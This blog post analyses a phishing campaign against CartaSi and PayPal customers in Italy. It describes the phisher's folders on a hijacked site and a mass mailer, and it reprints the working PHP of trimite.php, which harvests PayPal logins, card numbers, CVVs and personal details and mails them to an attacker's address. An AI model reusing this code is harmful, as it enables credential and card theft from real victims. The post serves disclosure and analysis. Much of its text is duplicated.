CartaSi phishing email part 2/2
Behind this phishing emails there are several people or just one guy ?
What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.
Where is he from ?
His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.
I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.
The emails address are stored in 30 rar files named pastoteXX.
From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.
When a victim click on the link will be redirected to this fake page on this site.
Once logged in
Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.
He did a good job to replicate paypal login process.
In the stf folder all stolen data are sent to fanemacaz@gmail.com and the techniques used to trick users are the same explained previously.
Folder index file.
Folder content.
That's all for now.
What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.
Where is he from ?
His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.
I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
- d3b (postepay information stealer)
- stf (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
- pastote (cartasi, paypal, VISA, bancopostaclick)
Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.
The emails address are stored in 30 rar files named pastoteXX.
From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.
When a victim click on the link will be redirected to this fake page on this site.
Once logged in
Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.
$username = $_POST['username']; $password = $_POST['password']; $ip = $_SERVER['REMOTE_ADDR']; $data = date("l, F d, Y h:i" ,time()); $agent = $_SERVER['HTTP_USER_AGENT']; $nome = $_POST['nome']; $cognome = $_POST['cognome']; $c_tip = $_POST['credit_card_type']; $cn = $_POST['cc_number']; $an = $_POST['expdate_year']; $luna = $_POST['expdate_month']; $cvv = $_POST['cvv']; $dob_ziua = $_POST['dob_ziua']; $dob_luna = $_POST['dob_luna']; $dob_an = $_POST['dob_an']; $address1 = $_POST['adresa']; $zip = $_POST['cod_postal']; $city = $_POST['oras']; $state = $_POST['provincie']; //---Email---// $email = "--snip--@fastwebmail.it"; $subiect = "$ip:$username:$password"; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; $mesaj_html ="
Indirizzo email $username Password PayPal $password
Nome $nome Gnome $cognome Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)
Indirizzo $address1 CAP $zip Città $city Provincia $state
Tipo di carta di credito $c_tip Numero della carta di credito $cn Data di scadenza $luna/$an Codice di sicurezza della carta $cvv
"; mail($email, $subiect, $mesaj_html, $headers); header("Location: http://www.paypal.it");
IP $ip Data $data Browser $agent
He did a good job to replicate paypal login process.
In the stf folder all stolen data are sent to fanemacaz@gmail.com and the techniques used to trick users are the same explained previously.
Folder index file.
Folder content.
That's all for now.
these guys have been arrested in romania
ReplyDeleteGood news. There is any site that report this news ?
Deletehttp://www.opinii.biz/2012/04/george-ariel-boltocgavril-tiberiu.html
Deletehttp://www.ziaruldepascani.ro/index.php?option=com_content&view=article&id=2924:romario-mistocar-si-fratii-paiu-arestati-pentru-clonare-de-cardurivideo&catid=17:slider
http://www.adevarul.ro/locale/iasi/Tinerii_care_furau_bani_de_pe_carduri_si_ii_jucau_la_pariuri_stau_29_de_zile_dupa_gratii_0_691731080.html
Can you give me an email adress to talk to you in private please?
Thanks
Thank you for the links. I added a box with my email address in the right column of the blog.
Delete